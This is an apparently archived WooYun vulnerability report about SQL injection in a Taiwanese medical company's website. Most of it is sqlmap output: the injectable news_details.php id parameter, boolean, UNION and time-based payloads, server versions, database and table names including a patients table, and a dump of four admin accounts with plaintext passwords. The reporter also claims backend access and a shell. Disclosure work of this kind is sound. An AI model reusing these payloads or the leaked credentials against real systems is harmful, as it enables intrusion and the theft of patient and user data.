乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
臺灣醫澤實業有限公司存在sql注入,大量用戶數據洩漏
臺灣醫澤實業有限公司:**.**.**.**注入點:**.**.**.**/news_details.php?id=47
注入點:**.**.**.**/news_details.php?id=47,結果如下
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=47 AND 4681=4681 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: id=-8225 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176757671,0x48414d58485059537846,0x71676f6771),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=47 AND SLEEP(5)web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0.11
數據庫名
available databases [2]:[*] information_schema[*] meditech
錶名
Database: information_schema[16 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || KEY_COLUMN_USAGE || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: meditech[13 tables]+--------------+| user || admin || dangev || faq || fluid || login_log || medinews || message || patients || sendpdf || sendpdfserum || serum || serumv |+--------------+
跑admin錶,得到後臺帳號密碼,進入後臺
Database: meditechTable: admin[4 entries]+-----------+----------+| adminname | password |+-----------+----------+| meditech | 28831673 || admin2 | 303517 || admin3 | 80652236 || cathay | cathay |+-----------+----------+
shell如圖:
過濾
危害等级:高
漏洞Rank:18
确认时间:2016-01-14 03:35
感謝通報
暂无